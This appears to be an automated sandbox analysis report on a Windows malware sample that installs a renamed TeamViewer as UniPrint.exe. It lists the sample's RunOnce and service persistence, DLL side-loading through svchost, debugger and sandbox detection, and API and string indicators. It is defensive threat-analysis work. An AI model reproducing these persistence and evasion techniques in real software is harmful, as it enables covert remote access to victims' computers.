Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\user\Desktop\wogZe27GBB.exe
Source: wogZe27GBB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF7DE.tmp
Source: classification engineClassification label: mal76.evad.winEXE@23/18@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,74E3A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70989B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983DC0 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAAFKBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6032:120:WilError_01
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.ini
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: wogZe27GBB.exeStatic file information: File size 1773472 > 1048576
Source: wogZe27GBB.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe File created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70983920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe
Source: C:\Users\user\Desktop\wogZe27GBB.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00500C6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FFF68
Source: C:\Windows\System32\svchost.exe TID: 6704 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164 Thread sleep count: 103 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 7164 Thread sleep time: -51500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392 Thread sleep count: 80 > 30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe TID: 2392 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000003.00000002.512388496.0000024FAA829000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`S
Source: svchost.exe, 00000003.00000002.543297207.0000024FB0048000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.509995145.0000020167402000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000007.00000002.511295701.0000020167428000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.512172229.000001563502A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_7098B890 FreeLibrary,GetProcessHeap,HeapFree,HeapDestroy,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 4_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709854A0 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exe Process created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: 2_2_709834E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Program ManagerX
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp Binary or memory string: Program Manager4
Source: UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
